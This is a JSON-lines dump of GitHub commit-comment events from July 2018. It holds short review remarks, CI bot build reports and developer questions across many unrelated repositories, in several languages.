{"id":"8016713508","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29829428,"position":null,"line":null,"path":null,"commit_id":"4c9149d558161e7d3e363fb697f5852bc5742a36","created_at":"2018-07-25T14:06:32Z","updated_at":"2018-07-25T14:06:32Z","author_association":"CONTRIBUTOR","body":"🎉"}},"created_at":"2018-07-25T14:06:32Z"}
{"id":"8016714192","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29829429,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T14:06:39Z","updated_at":"2018-07-25T14:06:39Z","author_association":"NONE","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T14:06:39Z"}
{"id":"8016719812","type":"CommitCommentEvent","actor":{"login":"morice-net"},"repo":{"name":"morice-net/FastCache"},"payload":{"comment":{"id":29829436,"position":44,"line":207,"path":"cachesbbox.cpp","commit_id":"4db16bf7986813f2e944370fb373fdf4739a1c33","created_at":"2018-07-25T14:07:30Z","updated_at":"2018-07-25T14:07:30Z","author_association":"OWNER","body":"Oups ! "}},"created_at":"2018-07-25T14:07:30Z"}
{"id":"8016721561","type":"CommitCommentEvent","actor":{"login":"dongkoull"},"repo":{"name":"dongkoull/TIL"},"payload":{"comment":{"id":29829439,"position":null,"line":null,"path":null,"commit_id":"5afad7b9766d8411a1c6056f22bf1077a41b8c46","created_at":"2018-07-25T14:07:46Z","updated_at":"2018-07-25T14:07:46Z","author_association":"OWNER","body":"댓글"}},"created_at":"2018-07-25T14:07:46Z"}
{"id":"8016723506","type":"CommitCommentEvent","actor":{"login":"mikanmatsuri"},"repo":{"name":"mikanmatsuri/mikantaberu"},"payload":{"comment":{"id":29829445,"position":null,"line":null,"path":null,"commit_id":"34f802d375147e4923536c9c6a6e064f43fd4f92","created_at":"2018-07-25T14:08:04Z","updated_at":"2018-07-25T14:08:04Z","author_association":"OWNER","body":"ブロック要素\r\n<div></div>(ここで自動的に改行が入る)<div></div>\r\n他に\r\n<p>\r\n<ul>\r\n<h1>\r\n\r\nインライン要素\r\n<span></span>(ここで自動的に改行が入らない)<span></span>\r\nテキストのスタイルを指定するために使われる\r\n他に\r\n<a>\r\n<img>\r\n<b>"}},"created_at":"2018-07-25T14:08:04Z"}
{"id":"8016726057","type":"CommitCommentEvent","actor":{"login":"exxonose"},"repo":{"name":"exxonose/mydiary"},"payload":{"comment":{"id":29829452,"position":3,"line":1,"path":"README.md","commit_id":"5350da1783f6ecccb1ec9a77c300c29e00526e5d","created_at":"2018-07-25T14:08:29Z","updated_at":"2018-07-25T14:08:29Z","author_association":"OWNER","body":"My Diary is an online journal were registered users can share their thoughts and also set and get daily notifications that prompt them to add an entry to their diary"}},"created_at":"2018-07-25T14:08:29Z"}
{"id":"8016726324","type":"CommitCommentEvent","actor":{"login":"tombh"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29829454,"position":null,"line":null,"path":null,"commit_id":"e99a79b5fc319b4b7ef9d15bb8513ef5807d41be","created_at":"2018-07-25T14:08:31Z","updated_at":"2018-07-25T14:08:31Z","author_association":"MEMBER","body":"Haha, yes I agree! Let me explain me thinking...\r\n\r\nI think I've had about 3 difficult to decipher bugs because of UPX compression, which although I were eventually fixed, does make me wonder if it'll continue to be a source of trouble.\r\n\r\nAlso, I'd originally decided to compress the binaries as it as in keeping with Browsh's usefulness to those with bad bandwidth. However, the point is that such people should be installing Browsh on a *remote* server, where there is good internet, such that one would hope they never even notice the difference between a 2Mb and 7Mb download. Besides if you're using Browsh locally, you'll never get any bandwidth savings as it's Firefox in the background doing its normal thing.\r\n\r\nI may however revisit this one day, to make compressed binaries available alongside the normal ones."}},"created_at":"2018-07-25T14:08:31Z"}
{"id":"8016727971","type":"CommitCommentEvent","actor":{"login":"jaimonjacob"},"repo":{"name":"jaimonjacob/slwebapp"},"payload":{"comment":{"id":29829458,"position":null,"line":null,"path":null,"commit_id":"867fb89bbe3be21bfd8024d7752ca4a00d79f674","created_at":"2018-07-25T14:08:48Z","updated_at":"2018-07-25T14:08:48Z","author_association":"OWNER","body":"Reverse"}},"created_at":"2018-07-25T14:08:48Z"}
{"id":"8016731412","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29829470,"position":null,"line":null,"path":null,"commit_id":"9e47943283ffac5eaa37ef5b4b87e4acf0a3f8fa","created_at":"2018-07-25T14:09:21Z","updated_at":"2018-07-25T14:09:21Z","author_association":"NONE","body":"@kain88-de why did the ntric_vec stuff get removed here?"}},"created_at":"2018-07-25T14:09:21Z"}
{"id":"8016732188","type":"CommitCommentEvent","actor":{"login":"brtdv"},"repo":{"name":"CleverIT/UBL_invoice"},"payload":{"comment":{"id":29829471,"position":null,"line":null,"path":null,"commit_id":"d219ac5889a681f96902b8db03748377de5769d2","created_at":"2018-07-25T14:09:28Z","updated_at":"2018-07-25T14:09:28Z","author_association":"NONE","body":"What docs are you reading? I'm looking at \r\nhttps://docs.oasis-open.org/ubl/os-UBL-2.0/xsd/maindoc/UBL-Invoice-2.0.xsd, and it says `<xsd:element ref=\"cac:TaxTotal\" minOccurs=\"0\" maxOccurs=\"unbounded\">`?"}},"created_at":"2018-07-25T14:09:28Z"}
{"id":"8016744084","type":"CommitCommentEvent","actor":{"login":"nlalonde"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29829496,"position":31,"line":606,"path":"spec/components/post_destroyer_spec.rb","commit_id":"417bcf7d2e3bf0c31320f71a919a29c6e2150267","created_at":"2018-07-25T14:11:12Z","updated_at":"2018-07-25T14:11:12Z","author_association":"MEMBER","body":"Putting a question? mark in the middle of the question\r\n\r\nFeels wrong!"}},"created_at":"2018-07-25T14:11:12Z"}
{"id":"8016762686","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29829518,"position":null,"line":null,"path":null,"commit_id":"5ab50d9024210168ef54ee05bad9eb6447a5118a","created_at":"2018-07-25T14:14:05Z","updated_at":"2018-07-25T14:14:05Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ab50d9024210168ef54ee05bad9eb6447a5118a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-25T14:14:05Z"}
{"id":"8016764863","type":"CommitCommentEvent","actor":{"login":"homer8173"},"repo":{"name":"CleverIT/UBL_invoice"},"payload":{"comment":{"id":29829523,"position":null,"line":null,"path":null,"commit_id":"d219ac5889a681f96902b8db03748377de5769d2","created_at":"2018-07-25T14:14:24Z","updated_at":"2018-07-25T14:14:24Z","author_association":"NONE","body":"you are right the doc i have mentioned is wrong"}},"created_at":"2018-07-25T14:14:24Z"}
{"id":"8016768698","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29829527,"position":null,"line":null,"path":null,"commit_id":"707150bc6fea9ccb95e3c9e7ed0c59bc3ff9b548","created_at":"2018-07-25T14:15:00Z","updated_at":"2018-07-25T14:15:00Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-39](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-39).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-39-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T14:15:00Z"}
{"id":"8016780096","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29829548,"position":null,"line":null,"path":null,"commit_id":"194ef1664dfba716801a170543ee05594849b886","created_at":"2018-07-25T14:16:44Z","updated_at":"2018-07-25T14:16:44Z","author_association":"COLLABORATOR","body":"https://bugs.limesurvey.org/view.php?id=13908"}},"created_at":"2018-07-25T14:16:44Z"}
{"id":"8016781801","type":"CommitCommentEvent","actor":{"login":"TimZ99"},"repo":{"name":"phpservermon/phpservermon"},"payload":{"comment":{"id":29829549,"position":null,"line":null,"path":null,"commit_id":"c2eeadc844352d77324a0327f320cb8d61e02ba2","created_at":"2018-07-25T14:17:00Z","updated_at":"2018-07-25T14:17:00Z","author_association":"MEMBER","body":"They where already there."}},"created_at":"2018-07-25T14:17:00Z"}
{"id":"8016785975","type":"CommitCommentEvent","actor":{"login":"ldmberman"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":29829558,"position":6,"line":590,"path":"bigchaindb/common/transaction.py","commit_id":"5426732090de92765ad3c17a5f38f40b3015c545","created_at":"2018-07-25T14:17:38Z","updated_at":"2018-07-25T14:17:38Z","author_association":"MEMBER","body":"On a side note, we need to replace this monster with a schema validation in the future."}},"created_at":"2018-07-25T14:17:38Z"}
{"id":"8016788156","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29829564,"position":31,"line":12,"path":"1/right_triangle.rb","commit_id":"f1dce476a162d2f40eadf1d1ee11baef68b1d0db","created_at":"2018-07-25T14:17:58Z","updated_at":"2018-07-25T14:17:58Z","author_association":"NONE","body":"```\r\nМне нужно было, чтобы элементы отсортировались по убыванию, а не возрастанию, как делается по умолчанию методом .sort.\r\n```\r\nНе обязательно. Можно было просто назначить переменной последнее значение как самой длинной\r\n```\r\nhypo = sides[2]\r\ncat1 = sides[1]\r\ncat2 = sides[0]\r\n```\r\nИ именно так я и рекомендую сделать. Потому-что переназначать переменные, это редко бывает хорошей идеей. Тогда нужно постоянно помнить в каком именно контексте ты находишься (какое значение у переменной на данный момент). Можно представить, что этот файл вдруг стал на 1000 строк и в конце используя переменную a - уже не понятно катет ли она, или случайное значение. Тогда нужно будет пройти по всему файлу  и отследить изменения в а. Лучше сразу назвать переменную cat1 и тогда уже понятно, с чем мы работаем, где бы не находились"}},"created_at":"2018-07-25T14:17:58Z"}
{"id":"8016801973","type":"CommitCommentEvent","actor":{"login":"ajtga"},"repo":{"name":"flow-ufal/phi"},"payload":{"comment":{"id":29829594,"position":null,"line":null,"path":null,"commit_id":"2a557a90223e3ba678c1b6046421f75bc9a7071f","created_at":"2018-07-25T14:20:08Z","updated_at":"2018-07-25T14:20:08Z","author_association":"MEMBER","body":"This was a mistake. I was editing another branch but wanted to commit the changes to master. I ended up merging and pushing by mistake. :disappointed_relieved: "}},"created_at":"2018-07-25T14:20:08Z"}
{"id":"8016804810","type":"CommitCommentEvent","actor":{"login":"ldmberman"},"repo":{"name":"bigchaindb/bigchaindb"},"payload":{"comment":{"id":29829599,"position":108,"line":1239,"path":"bigchaindb/common/transaction.py","commit_id":"5426732090de92765ad3c17a5f38f40b3015c545","created_at":"2018-07-25T14:20:32Z","updated_at":"2018-07-25T14:20:32Z","author_association":"MEMBER","body":"A neatpick:\r\n\r\n```\r\ncreate_class = Transaction.type_registry.get(Transaction.CREATE)\r\nreturn Transaction.type_registry.get(operation, create_class)\r\n```"}},"created_at":"2018-07-25T14:20:32Z"}
{"id":"8016805374","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829601,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:20:38Z","updated_at":"2018-07-25T14:20:38Z","author_association":"NONE","body":"看到有更新激动得拍起了肚皮\r\n结果发现更新的是更新 ("}},"created_at":"2018-07-25T14:20:38Z"}
{"id":"8016812048","type":"CommitCommentEvent","actor":{"login":"sjetha-pason"},"repo":{"name":"Marusyk/cake"},"payload":{"comment":{"id":29829615,"position":5,"line":42,"path":"src/Cake.Common/Tools/DotNetCore/Publish/DotNetCorePublishSettings.cs","commit_id":"a51aeeec22cd83e74036ecaafbfb0ba5a5617b03","created_at":"2018-07-25T14:21:35Z","updated_at":"2018-07-25T14:21:35Z","author_association":"NONE","body":"I'm going to leave a small comment here to say that I think that the grammar should be cleaned up on this line a little bit."}},"created_at":"2018-07-25T14:21:35Z"}
{"id":"8016815736","type":"CommitCommentEvent","actor":{"login":"HontoNoRoger"},"repo":{"name":"lammel/redmine_issue_checklist"},"payload":{"comment":{"id":29829623,"position":null,"line":null,"path":null,"commit_id":"08a13fbcd554084ca75e229f75c986b3750db562","created_at":"2018-07-25T14:22:09Z","updated_at":"2018-07-25T14:22:09Z","author_association":"NONE","body":"also works for my installation :+1: \r\nDon't you want to also push this to the original repo as well?"}},"created_at":"2018-07-25T14:22:09Z"}
{"id":"8016816098","type":"CommitCommentEvent","actor":{"login":"richardchien"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829625,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:22:12Z","updated_at":"2018-07-25T14:22:12Z","author_association":"OWNER","body":"2333"}},"created_at":"2018-07-25T14:22:12Z"}
{"id":"8016816217","type":"CommitCommentEvent","actor":{"login":"mattjreynolds"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":29829626,"position":null,"line":null,"path":null,"commit_id":"22afbf04e8e30fb5fa5183597d10810a79befeaa","created_at":"2018-07-25T14:22:13Z","updated_at":"2018-07-25T14:22:13Z","author_association":"NONE","body":"These hooks enable building a script with the following imports:\r\n```\r\nfrom google.cloud import translate\r\nfrom google.api_core import exceptions\r\n```\r\nThe google.api_core hook should also resolve this pr: #3251\r\n"}},"created_at":"2018-07-25T14:22:13Z"}
{"id":"8016820427","type":"CommitCommentEvent","actor":{"login":"zerolab"},"repo":{"name":"OpenTechFund/opentech.fund"},"payload":{"comment":{"id":29829632,"position":4,"line":37,"path":"opentech/apply/users/forms.py","commit_id":"b7bf621d1244984590a9ed455f48023f43cb4da3","created_at":"2018-07-25T14:22:52Z","updated_at":"2018-07-25T14:22:52Z","author_association":"COLLABORATOR","body":"hmm, thinking of it, should this be reflected in the Wagtail admin as well?\r\n"}},"created_at":"2018-07-25T14:22:52Z"}
{"id":"8016822097","type":"CommitCommentEvent","actor":{"login":"DovMiller"},"repo":{"name":"DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094"},"payload":{"comment":{"id":29829635,"position":null,"line":null,"path":null,"commit_id":"5f4e4dacd19e5c5734754284bed1f3047074633e","created_at":"2018-07-25T14:23:08Z","updated_at":"2018-07-25T14:23:08Z","author_association":"NONE","body":"Hi'\nFrom a link on this DevExpress page HERE\n<https://www.devexpress.com/Support/Center/Question/Details/T131730/aspxdocumentviewer-how-to-display-report-in-the-document-viewer-dynamically>\nand\nthru the DevExpress search.\n\nOn Wed, Jul 25, 2018 at 4:29 PM, MikhailTymchukDX <notifications@github.com>\nwrote:\n\n> Hi @DovMiller <https://github.com/DovMiller>\n> Would you please specify how you reached the example source code?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094/commit/5f4e4dacd19e5c5734754284bed1f3047074633e#commitcomment-29828908>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcFfpejum_ro3zRMEYzSEo2poxizGgitks5uKHKmgaJpZM4Vf-3z>\n> .\n>\n"}},"created_at":"2018-07-25T14:23:08Z"}
{"id":"8016864097","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829732,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:29:23Z","updated_at":"2018-07-25T14:29:23Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/20554060/43207203-186bbca4-905a-11e8-9fe6-611ff61a7364.png)\r\n顺便问一下这是玄学错误还是什么的 (((\r\n我的程序正常但我手动就不正常"}},"created_at":"2018-07-25T14:29:23Z"}
{"id":"8016864507","type":"CommitCommentEvent","actor":{"login":"victorsosa"},"repo":{"name":"peoplewareDo/nativescript-svg"},"payload":{"comment":{"id":29829735,"position":null,"line":null,"path":null,"commit_id":"71acb89f4914e2858c04e07d32ecfcd155b60335","created_at":"2018-07-25T14:29:27Z","updated_at":"2018-07-25T14:29:27Z","author_association":"CONTRIBUTOR","body":"fix issue #29 "}},"created_at":"2018-07-25T14:29:27Z"}
{"id":"8016866721","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29829739,"position":40,"line":16,"path":"1/right_triangle.rb","commit_id":"f1dce476a162d2f40eadf1d1ee11baef68b1d0db","created_at":"2018-07-25T14:29:47Z","updated_at":"2018-07-25T14:29:47Z","author_association":"NONE","body":"Проверка равнобедренного треугольника должна быть только у прямоугольного треугольника. Нужно решить не используя вложенные условия. Это можно сделать правильно скомбинировав условия."}},"created_at":"2018-07-25T14:29:47Z"}
{"id":"8016870323","type":"CommitCommentEvent","actor":{"login":"kain88-de"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29829750,"position":null,"line":null,"path":null,"commit_id":"9e47943283ffac5eaa37ef5b4b87e4acf0a3f8fa","created_at":"2018-07-25T14:30:17Z","updated_at":"2018-07-25T14:30:17Z","author_association":"NONE","body":"It's not used and deleted code has the benefit of being bug-free, doesn't need to be tested."}},"created_at":"2018-07-25T14:30:17Z"}
{"id":"8016872108","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29829752,"position":21,"line":14,"path":"1/quadratic_equation_solutions.rb","commit_id":"f1dce476a162d2f40eadf1d1ee11baef68b1d0db","created_at":"2018-07-25T14:30:31Z","updated_at":"2018-07-25T14:30:31Z","author_association":"NONE","body":"Можно просто -b, что-бы не умножать на -1"}},"created_at":"2018-07-25T14:30:31Z"}
{"id":"8016873120","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829753,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:30:40Z","updated_at":"2018-07-25T14:30:40Z","author_association":"NONE","body":"发送hello/你好/test一类的也不行"}},"created_at":"2018-07-25T14:30:40Z"}
{"id":"8016875986","type":"CommitCommentEvent","actor":{"login":"SeleniumResource2"},"repo":{"name":"teamlead11/TestGit12"},"payload":{"comment":{"id":29829756,"position":null,"line":null,"path":null,"commit_id":"6f0a5eb9a988c4d2f26486b4af74a16648cb038f","created_at":"2018-07-25T14:31:05Z","updated_at":"2018-07-25T14:31:05Z","author_association":"COLLABORATOR","body":"updated this commit"}},"created_at":"2018-07-25T14:31:05Z"}
{"id":"8016879295","type":"CommitCommentEvent","actor":{"login":"fnevgeny"},"repo":{"name":"flexible-atomic-code/fac"},"payload":{"comment":{"id":29829760,"position":null,"line":null,"path":null,"commit_id":"3aae2fd8f8d478aec71805bbec330fc3caa821f4","created_at":"2018-07-25T14:31:34Z","updated_at":"2018-07-25T14:31:34Z","author_association":"COLLABORATOR","body":"I believe by changing LSNAME and LNAME you break binary compatibility with previous versions. Conditional processing like `if (version_read[DB_EN-1]...)` should be added or there would be crashes."}},"created_at":"2018-07-25T14:31:34Z"}
{"id":"8016879440","type":"CommitCommentEvent","actor":{"login":"sidbalu7"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29829762,"position":10,"line":42,"path":"securegateway_requirements.md","commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-25T14:31:36Z","updated_at":"2018-07-25T14:31:36Z","author_association":"NONE","body":"Region"}},"created_at":"2018-07-25T14:31:36Z"}
{"id":"8016879767","type":"CommitCommentEvent","actor":{"login":"richardchien"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829763,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:31:39Z","updated_at":"2018-07-25T14:31:39Z","author_association":"OWNER","body":"用 curl 的时候，因为 url 里面出现 `&` 了，被 shell 理解为在后台运行，你需要用 `\"\"` 包裹 url"}},"created_at":"2018-07-25T14:31:39Z"}
{"id":"8016880791","type":"CommitCommentEvent","actor":{"login":"TechnoBlogger14o3"},"repo":{"name":"TechnoBlogger14o3/Logger"},"payload":{"comment":{"id":29829765,"position":null,"line":null,"path":null,"commit_id":"5ffbdad87a0af0c4c0034627174b7a5c1f46d7f5","created_at":"2018-07-25T14:31:47Z","updated_at":"2018-07-25T14:31:47Z","author_association":"OWNER","body":"# Restricting The Log\r\n## In build.gradle file\r\n ```\r\nbuildTypes {\r\n        debug {\r\n            buildConfigField \"boolean\", \"ON_DEBUG_MODE\", \"true\"\r\n        }    \r\n        release {\r\n            minifyEnabled false\r\n            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\r\n            buildConfigField \"boolean\", \"ON_DEBUG_MODE\", \"false\"\r\n         }\r\n    }\r\n```\r\n\r\n## In Custom Log Class\r\n\r\n```\r\npublic class AppLogger {\r\npublic static void e(String tag, String msg) {\r\n        if (!BuildConfig.ON_DEBUG_MODE)\r\n            return;\r\n        if (msg.length() > 4000) {\r\n            android.util.Log.e(tag, msg.substring(0, 4000));\r\n            e(\"\", \"\" + checkInstanceOfException(msg.substring(4000)));\r\n        } else\r\n            android.util.Log.e(tag, \"\" + checkInstanceOfException(msg));\r\n    }\r\n}\r\n```\r\n\r\n## In your Activity/Fragment or any other class where you want to print Log.\r\n\r\n```\r\nAppLogger.e(\"Came in\", \" AppLogger Class\");\r\n\r\n```"}},"created_at":"2018-07-25T14:31:47Z"}
{"id":"8016885508","type":"CommitCommentEvent","actor":{"login":"TechnoBlogger14o3"},"repo":{"name":"TechnoBlogger14o3/Logger"},"payload":{"comment":{"id":29829772,"position":2,"line":3,"path":"README.md","commit_id":"5ffbdad87a0af0c4c0034627174b7a5c1f46d7f5","created_at":"2018-07-25T14:32:28Z","updated_at":"2018-07-25T14:32:28Z","author_association":"OWNER","body":"# Restricting The Log\r\n## In build.gradle file\r\n ```\r\nbuildTypes {\r\n        debug {\r\n            buildConfigField \"boolean\", \"ON_DEBUG_MODE\", \"true\"\r\n        }    \r\n        release {\r\n            minifyEnabled false\r\n            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\r\n            buildConfigField \"boolean\", \"ON_DEBUG_MODE\", \"false\"\r\n         }\r\n    }\r\n```\r\n\r\n## In Custom Log Class\r\n\r\n```\r\npublic class AppLogger {\r\npublic static void e(String tag, String msg) {\r\n        if (!BuildConfig.ON_DEBUG_MODE)\r\n            return;\r\n        if (msg.length() > 4000) {\r\n            android.util.Log.e(tag, msg.substring(0, 4000));\r\n            e(\"\", \"\" + checkInstanceOfException(msg.substring(4000)));\r\n        } else\r\n            android.util.Log.e(tag, \"\" + checkInstanceOfException(msg));\r\n    }\r\n}\r\n```\r\n\r\n## In your Activity/Fragment or any other class where you want to print Log.\r\n\r\n```\r\nAppLogger.e(\"Came in\", \" AppLogger Class\");\r\n\r\n```"}},"created_at":"2018-07-25T14:32:28Z"}
{"id":"8016886174","type":"CommitCommentEvent","actor":{"login":"mrbean-bremen"},"repo":{"name":"rhaxton/pydicom"},"payload":{"comment":{"id":29829774,"position":52,"line":264,"path":"pydicom/encaps.py","commit_id":"c029070f41d39e436a2fe32f77053b5e05bcbf0b","created_at":"2018-07-25T14:32:34Z","updated_at":"2018-07-25T14:32:34Z","author_association":"NONE","body":"you need bytes here, e.g.\r\n```python\r\nif fragment[-10:].find(b'\\xFF\\xD9') > 0:\r\n```"}},"created_at":"2018-07-25T14:32:34Z"}
{"id":"8016886473","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29829775,"position":null,"line":null,"path":null,"commit_id":"9e47943283ffac5eaa37ef5b4b87e4acf0a3f8fa","created_at":"2018-07-25T14:32:37Z","updated_at":"2018-07-25T14:32:37Z","author_association":"NONE","body":"Yeah I see that now, so now I'm confused why @seb-buch isn't using the triclinic shifts like gromacs does?  I thought that was required to make sure we find all triclinic minimum images."}},"created_at":"2018-07-25T14:32:37Z"}
{"id":"8016888881","type":"CommitCommentEvent","actor":{"login":"sidbalu7"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29829782,"position":null,"line":null,"path":null,"commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-25T14:32:58Z","updated_at":"2018-07-25T14:32:58Z","author_association":"NONE","body":"The 9000 ports for au-syd is not yet added  ? "}},"created_at":"2018-07-25T14:32:58Z"}
{"id":"8016890183","type":"CommitCommentEvent","actor":{"login":"plbossart"},"repo":{"name":"bkokoszx/sof"},"payload":{"comment":{"id":29829789,"position":5,"line":270,"path":"src/drivers/apl-ssp.c","commit_id":"aaff1dcdbcf8a18c72649e0d11f8e8e5357f8df3","created_at":"2018-07-25T14:33:10Z","updated_at":"2018-07-25T14:33:10Z","author_association":"NONE","body":"I suggest we use the SSP structure, there was a quirk field that was commented out.\r\nAlso let's not mix SOF_DAI_FMT with these quirks, we can add something like\r\nSOF_DAI_INTEL_SSP_QUIRK_XYZ instead."}},"created_at":"2018-07-25T14:33:10Z"}
{"id":"8016894651","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829796,"position":7,"line":7,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:33:49Z","updated_at":"2018-07-25T14:33:49Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:33:49Z"}
{"id":"8016899192","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829800,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:34:28Z","updated_at":"2018-07-25T14:34:28Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/20554060/43207556-dee2be00-905a-11e8-9e6c-c42d3cd95cd5.png)\r\n貌似还是不行?"}},"created_at":"2018-07-25T14:34:28Z"}
{"id":"8016899538","type":"CommitCommentEvent","actor":{"login":"sidbalu7"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29829802,"position":103,"line":135,"path":"securegateway_requirements.md","commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-25T14:34:31Z","updated_at":"2018-07-25T14:34:31Z","author_association":"NONE","body":"eu-de to au-syd"}},"created_at":"2018-07-25T14:34:31Z"}
{"id":"8016902531","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829808,"position":8,"line":8,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:34:58Z","updated_at":"2018-07-25T14:34:58Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:34:58Z"}
{"id":"8016903849","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829812,"position":9,"line":9,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:35:10Z","updated_at":"2018-07-25T14:35:10Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:35:10Z"}
